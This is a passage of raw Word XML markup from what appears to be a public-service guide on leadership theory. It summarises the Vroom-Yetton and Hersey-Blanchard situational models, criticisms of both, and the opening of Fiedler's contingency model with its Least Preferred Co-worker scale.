        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00637E31" w:rsidRDefault="00DE18C3" w:rsidP="005A0D09">
      <w:r>
        <w:t xml:space="preserve">In the mid-1970s Vroom and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Yetton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A47586">
        <w:t xml:space="preserve">used rigorous deduction and support from controlled empirical studies and experiments to develop a model </w:t>
      </w:r>
      <w:r w:rsidR="00343165">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">assist leaders </w:t>
      </w:r>
      <w:r w:rsidR="00C24565">
        <w:t xml:space="preserve">to determine </w:t>
      </w:r>
      <w:r w:rsidR="00343165">
        <w:t xml:space="preserve">the most effective </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">approach to decision making. </w:t>
      </w:r>
      <w:r w:rsidR="00A47586">
        <w:t xml:space="preserve">Their </w:t>
      </w:r>
      <w:r w:rsidR="001F0714">
        <w:t xml:space="preserve">model suggests </w:t>
      </w:r>
      <w:r w:rsidR="00A32AB1">
        <w:t>the leadership decision style most conducive to effectiveness depends on the characteristics of the situation</w:t>
      </w:r>
      <w:r w:rsidR="00450475">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A32AB1">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00450475">
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidR="00A32AB1">
        <w:t xml:space="preserve">whether </w:t>
      </w:r>
      <w:r w:rsidR="00A47586">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00A32AB1">
        <w:t xml:space="preserve"> high-quality decision or subordinate acceptance of the decision</w:t>
      </w:r>
      <w:r w:rsidR="00A47586">
        <w:t xml:space="preserve"> is the leader’s primary goal</w:t>
      </w:r>
      <w:r w:rsidR="00A32AB1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A47586">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00C30D4D">
        <w:t xml:space="preserve">eaders work through a </w:t>
      </w:r>
      <w:r w:rsidR="00021258" w:rsidRPr="00021258">
        <w:t xml:space="preserve">series of questions </w:t>
      </w:r>
      <w:r w:rsidR="00A47586">
        <w:t>resulting</w:t>
      </w:r>
      <w:r w:rsidR="00021258" w:rsidRPr="00021258">
        <w:t xml:space="preserve"> in a recommended </w:t>
      </w:r>
      <w:r w:rsidR="00A47586">
        <w:t xml:space="preserve">decision-making </w:t>
      </w:r>
      <w:r w:rsidR="00021258" w:rsidRPr="00021258">
        <w:t xml:space="preserve">style </w:t>
      </w:r>
      <w:r w:rsidR="00A32AB1">
        <w:t>rang</w:t>
      </w:r>
      <w:r w:rsidR="00021258">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00A32AB1">
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidR="00C96C76">
        <w:t xml:space="preserve">directive </w:t>
      </w:r>
      <w:r w:rsidR="00021258">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00C96C76">
        <w:t xml:space="preserve">consultative, </w:t>
      </w:r>
      <w:r w:rsidR="00021258">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00C96C76">
        <w:t xml:space="preserve">on to participative decision making. A final style, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C96C76">
        <w:t>delegative</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C96C76">
        <w:t>, was</w:t>
      </w:r>
      <w:r w:rsidR="00021258">
        <w:t xml:space="preserve"> added</w:t>
      </w:r>
      <w:r w:rsidR="00C96C76">
        <w:t xml:space="preserve"> later. </w:t>
      </w:r>
      <w:r w:rsidR="0030348E">
        <w:t xml:space="preserve">Later revisions </w:t>
      </w:r>
      <w:r w:rsidR="00C30D4D">
        <w:t>also</w:t>
      </w:r>
      <w:r w:rsidR="0030348E">
        <w:t xml:space="preserve"> encouraged </w:t>
      </w:r>
      <w:r w:rsidR="00A47586">
        <w:t xml:space="preserve">reflection on past </w:t>
      </w:r>
      <w:r w:rsidR="0030348E">
        <w:t xml:space="preserve">decisions as part of </w:t>
      </w:r>
      <w:r w:rsidR="00A47586">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="0030348E">
        <w:t xml:space="preserve"> process </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="26154892"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="0030348E">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="0030348E">
            <w:instrText xml:space="preserve"> CITATION Bas08 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="0030348E">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="0030348E" w:rsidRPr="0030348E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Bass &amp; Bass, 2008)</w:t>
          </w:r>
          <w:r w:rsidR="0030348E">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="006B2F7D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5571" w:rsidRDefault="00BD5571" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Criticisms and challenges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A47586" w:rsidRDefault="00073BD3" w:rsidP="00214813">
      <w:r>
        <w:t xml:space="preserve">The dominant situational leadership models </w:t>
      </w:r>
      <w:r w:rsidR="00637E31">
        <w:t xml:space="preserve">have been </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">challenged </w:t>
      </w:r>
      <w:r w:rsidR="007622AF">
        <w:t xml:space="preserve">on a variety of fronts. The Hersey-Blanchard model </w:t>
      </w:r>
      <w:r w:rsidR="009D35EA">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00214813">
        <w:t>criticized because of the lack of internal consistency of its measures, its co</w:t>
      </w:r>
      <w:r w:rsidR="007622AF">
        <w:t>nceptual contradictions</w:t>
      </w:r>
      <w:r w:rsidR="00AD2F24">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007622AF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00637E31">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00AD2F24">
        <w:t xml:space="preserve">its </w:t>
      </w:r>
      <w:r w:rsidR="007622AF">
        <w:t xml:space="preserve">ambiguities. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007622AF">
        <w:t>Graeff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00214813">
        <w:t xml:space="preserve"> argue</w:t>
      </w:r>
      <w:r w:rsidR="00CB1DD8">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00214813">
        <w:t xml:space="preserve"> that the model appear</w:t>
      </w:r>
      <w:r w:rsidR="00CB1DD8">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00214813">
        <w:t xml:space="preserve"> to have no theoretical or logical justification,</w:t>
      </w:r>
      <w:r w:rsidR="007622AF">
        <w:t xml:space="preserve"> while Blake and Mouton maintain</w:t>
      </w:r>
      <w:r w:rsidR="00214813">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="00D63635">
        <w:t>Hersey and Blanchard misinterpreted the initial empirical evidence</w:t>
      </w:r>
      <w:r w:rsidR="009D35EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="778531751"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="009D35EA">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009D35EA">
            <w:instrText xml:space="preserve"> CITATION Bas08 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="009D35EA">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009D35EA" w:rsidRPr="005C26DE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Bass &amp; Bass, 2008)</w:t>
          </w:r>
          <w:r w:rsidR="009D35EA">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D63635">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D35EA" w:rsidRDefault="006D6420" w:rsidP="00214813">
      <w:r>
        <w:t xml:space="preserve">Studies </w:t>
      </w:r>
      <w:r w:rsidR="002E2866">
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> found that </w:t>
      </w:r>
      <w:r w:rsidR="002E2866">
        <w:t xml:space="preserve">in certain situations the leadership behaviour prescribed by </w:t>
      </w:r>
      <w:r>
        <w:t>both the Hersey-Blanchard and Vroom-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Yetton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> models </w:t>
      </w:r>
      <w:r w:rsidR="006E6C70">
        <w:t xml:space="preserve">can be </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">detrimental to </w:t>
      </w:r>
      <w:r w:rsidR="006E6C70">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> group’s efficiency and subordinates’ satisfaction </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="836653203"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Bas08 \l 3081 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="006D6420">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Bass &amp; Bass, 2008)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009F24D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0099354D">
        <w:t>In a practical sense, the Vroom-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0099354D">
        <w:t>Yetton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0099354D">
        <w:t xml:space="preserve"> model </w:t>
      </w:r>
      <w:r w:rsidR="002E2866">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="0099354D">
        <w:t xml:space="preserve">less a cohesive leadership </w:t>
      </w:r>
      <w:r w:rsidR="002E2866">
        <w:t xml:space="preserve">theory </w:t>
      </w:r>
      <w:r w:rsidR="0099354D">
        <w:t xml:space="preserve">than a </w:t>
      </w:r>
      <w:r w:rsidR="006E6C70">
        <w:t xml:space="preserve">potentially </w:t>
      </w:r>
      <w:r w:rsidR="0099354D">
        <w:t xml:space="preserve">useful tool for weighing up situational factors </w:t>
      </w:r>
      <w:r w:rsidR="00C30D4D">
        <w:t>to find</w:t>
      </w:r>
      <w:r w:rsidR="0099354D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E2866">
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidR="0099354D">
        <w:t xml:space="preserve"> appropriate decision making approach</w:t>
      </w:r>
      <w:r w:rsidR="008627E4">
        <w:t>, while the Hersey-Blanchard model assumes a direct and individual relationship between a leader and a follower, a rare situation in modern organisations</w:t>
      </w:r>
      <w:r w:rsidR="0099354D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001938A1" w:rsidRDefault="001938A1" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Further reading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001938A1" w:rsidRPr="00F57F81" w:rsidRDefault="00D35D68" w:rsidP="001938A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Paul Hersey, Kenneth H Blanchard &amp; Dewey E Johnson</w:t>
      </w:r>
      <w:r w:rsidR="00F57F81">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2012 [1977]).</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F57F81">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F57F81" w:rsidRPr="005C26DE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>Management of Organizational Behaviour</w:t>
      </w:r>
      <w:r w:rsidR="00F57F81" w:rsidRPr="005C26DE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="001938A1" w:rsidRDefault="00F57F81" w:rsidP="001938A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Victor H Vroom and Philip W </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Yetton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1973).</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C26DE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>Leadership and Decision-Making</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00886504" w:rsidRDefault="00886504">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86D6A" w:rsidRPr="00E86D6A" w:rsidRDefault="00E86D6A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc374536615"/>
      <w:r w:rsidRPr="005152CD">
        <w:lastRenderedPageBreak/>
        <w:t>Contingency theory</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="004C3718" w:rsidRDefault="009A234B" w:rsidP="005C26DE">
      <w:pPr>
        <w:pStyle w:val="APSCBulletedtext"/>
      </w:pPr>
      <w:r>
        <w:t>Contingency theory focusses on adapting situational variables to better suit a leader</w:t>
      </w:r>
      <w:r w:rsidR="001C6617">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>s style.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00084871" w:rsidRDefault="00D61889" w:rsidP="001E2602">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00050603">
        <w:t xml:space="preserve">ontingency theorists </w:t>
      </w:r>
      <w:r w:rsidR="0099354D">
        <w:t xml:space="preserve">agree that </w:t>
      </w:r>
      <w:r w:rsidR="00050603">
        <w:t xml:space="preserve">leadership theories must </w:t>
      </w:r>
      <w:r w:rsidR="009A234B">
        <w:t>take into account</w:t>
      </w:r>
      <w:r w:rsidR="00050603">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A234B">
        <w:t>the situation</w:t>
      </w:r>
      <w:r w:rsidR="00050603">
        <w:t xml:space="preserve"> in which leaders</w:t>
      </w:r>
      <w:r w:rsidR="009A234B">
        <w:t xml:space="preserve"> operate</w:t>
      </w:r>
      <w:r w:rsidR="00050603">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005541DF">
        <w:t xml:space="preserve">The best known contingency theory, </w:t>
      </w:r>
      <w:r w:rsidR="005541DF" w:rsidRPr="005541DF">
        <w:t>Fred Fiedler’s ‘Contingency Model’</w:t>
      </w:r>
      <w:r w:rsidR="005541DF">
        <w:t>, a</w:t>
      </w:r>
      <w:r w:rsidR="0099354D">
        <w:t xml:space="preserve">ssumes </w:t>
      </w:r>
      <w:r w:rsidR="00050603">
        <w:t>a leader</w:t>
      </w:r>
      <w:r w:rsidR="009A234B">
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="00050603">
        <w:t xml:space="preserve"> preferred style</w:t>
      </w:r>
      <w:r w:rsidR="0099354D">
        <w:t xml:space="preserve"> is effectively set, and </w:t>
      </w:r>
      <w:r w:rsidR="001C6617">
        <w:t>suggests</w:t>
      </w:r>
      <w:r w:rsidR="0099354D">
        <w:t xml:space="preserve"> adapting </w:t>
      </w:r>
      <w:r w:rsidR="00050603">
        <w:t xml:space="preserve">situational elements </w:t>
      </w:r>
      <w:r w:rsidR="0099354D">
        <w:t xml:space="preserve">to achieve </w:t>
      </w:r>
      <w:r w:rsidR="001C6617">
        <w:t>better</w:t>
      </w:r>
      <w:r w:rsidR="0099354D">
        <w:t xml:space="preserve"> outcome</w:t>
      </w:r>
      <w:r w:rsidR="001C6617">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0099354D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED6A66" w:rsidRDefault="00461CD8" w:rsidP="000C3612">
      <w:r>
        <w:t>Tested through a variety of field studies, t</w:t>
      </w:r>
      <w:r w:rsidR="008E484F">
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="005541DF">
        <w:t>model</w:t>
      </w:r>
      <w:r w:rsidR="009A234B">
        <w:t>’s basic premise</w:t>
      </w:r>
      <w:r w:rsidR="008E484F">
        <w:t xml:space="preserve"> is that ‘the performance of interacting groups is contingent upon the interaction of leadership styles and the favourability of the situation for the leader’</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1484668137"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="008E484F">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="008E484F">
            <w:instrText xml:space="preserve"> CITATION Mit70 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="008E484F">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="008E484F">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="008E484F" w:rsidRPr="008E484F">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Mitchell, et al., 1970)</w:t>
          </w:r>
          <w:r w:rsidR="008E484F">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="008E484F">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009F5202">
        <w:t>The leader’s style (</w:t>
      </w:r>
      <w:r w:rsidR="009A234B">
        <w:t xml:space="preserve">defined as </w:t>
      </w:r>
      <w:r w:rsidR="009F5202">
        <w:t xml:space="preserve">either task or relations oriented) </w:t>
      </w:r>
      <w:r w:rsidR="00084871">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="009F5202">
        <w:t xml:space="preserve">measured using a scale called the ‘Least Preferred Co-worker Scale’ </w:t>
      </w:r>
      <w:r w:rsidR="001E2602">
        <w:t xml:space="preserve">(LPC) </w:t>
      </w:r>
      <w:r w:rsidR="009F5202">
        <w:t xml:space="preserve">in which leaders rate the co-worker </w:t>
      </w:r>
      <w:r w:rsidR="003860F8">
        <w:t>they have least enjoyed working with on a variety of factors</w:t>
      </w:r>
      <w:r w:rsidR="001C6617">
        <w:t>. A high</w:t>
      </w:r>
      <w:r w:rsidR="001E2602">
        <w:t xml:space="preserve"> score indicates a </w:t>
      </w:r>
      <w:r w:rsidR="001C6617">
        <w:t>relations</w:t>
      </w:r>
      <w:r w:rsidR="007A129A">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="001C6617">
        <w:t xml:space="preserve">orientated </w:t>
      </w:r>
      <w:r w:rsidR="001E2602">
        <w:t>leader, a low score indicat</w:t>
      </w:r>
      <w:r w:rsidR="001C6617">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="001E2602">
        <w:t xml:space="preserve"> a leader more concerned with task</w:t>
      </w:r>
      <w:r w:rsidR="00084871">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E2602">
        <w:t>performance</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="22762270"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="001E2602">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001E2602">
            <w:instrText xml:space="preserve"> CITATION Mit70 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="001E2602">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="001E2602">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="001E2602" w:rsidRPr="001E2602">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Mitchell, et al., 1970)</w:t>
          </w:r>
          <w:r w:rsidR="001E2602">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="001E2602">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007E4CBA">
        <w:t>The rationale behind this is that relations</w:t>
      </w:r>
      <w:r w:rsidR="001C6617">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E4CBA">
        <w:t xml:space="preserve">oriented leaders are more inclined to view individuals with whom they least enjoyed working </w:t>
      </w:r>
      <w:r w:rsidR="00FD5C8B">
        <w:t>in more positive terms</w:t>
      </w:r>
      <w:r w:rsidR="007E4CBA">
        <w:t xml:space="preserve"> than task</w:t>
      </w:r>
      <w:r w:rsidR="00084871">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E4CBA">
        <w:t>oriented leaders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-616215539"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Bas08 \l 3081 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="005C26DE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Bass &amp; Bass, 2008)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="007E4CBA">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001E2602">
        <w:t xml:space="preserve">The second element </w:t>
      </w:r>
      <w:r w:rsidR="009A234B">
        <w:t xml:space="preserve">of the model </w:t>
      </w:r>
      <w:r w:rsidR="001E2602">
        <w:t xml:space="preserve">is the </w:t>
      </w:r>
      <w:r w:rsidR="00ED6A66">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="001E2602">
        <w:t>situation</w:t>
      </w:r>
      <w:r w:rsidR="00ED6A66">
        <w:t>al</w:t>
      </w:r>
      <w:r w:rsidR="001E2602">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED6A66">
        <w:t>favourableness dimension’</w:t>
      </w:r>
      <w:r w:rsidR="009A234B">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0026661E">
        <w:t>which takes into account</w:t>
      </w:r>
      <w:r w:rsidR="00ED6A66">
        <w:t xml:space="preserve"> three factors: the degree of support and cooperation offered by the followers; </w:t>
      </w:r>
      <w:r w:rsidR="001C6617">
        <w:t xml:space="preserve">whether the task is structured or </w:t>
      </w:r>
      <w:r w:rsidR="00ED6A66">
        <w:t xml:space="preserve">unstructured; and the leader’s formal authority to direct or reward followers </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1356736579"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00ED6A66">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00ED6A66">
            <w:instrText xml:space="preserve"> CITATION Che00 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00ED6A66">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00ED6A66" w:rsidRPr="005A0D09">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Chemers, 2000)</w:t>
          </w:r>
          <w:r w:rsidR="00ED6A66">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00ED6A66">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A63A91">
        <w:t xml:space="preserve">In combination, these factors result in eight types of situation which, according to the contingency model, differ </w:t>
      </w:r>
      <w:r w:rsidR="007A129A">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00A63A91">
        <w:t xml:space="preserve"> the degree to which a leader can influence and control group members</w:t>
      </w:r>
      <w:r w:rsidR="002C0FC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1081606573"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="002C0FC1">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="002C0FC1">
            <w:instrText xml:space="preserve"> CITATION Mit70 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="002C0FC1">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="002C0FC1" w:rsidRPr="002C0FC1">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Mitchell, et al., 1970)</w:t>
          </w:r>
          <w:r w:rsidR="002C0FC1">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00A63A91">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002C0FC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3612" w:rsidRDefault="00FD5C8B" w:rsidP="000C3612">
      <w:r>
        <w:t>According to Fiedler’s model a</w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t xml:space="preserve"> situation </w:t>
      </w:r>
      <w:r>
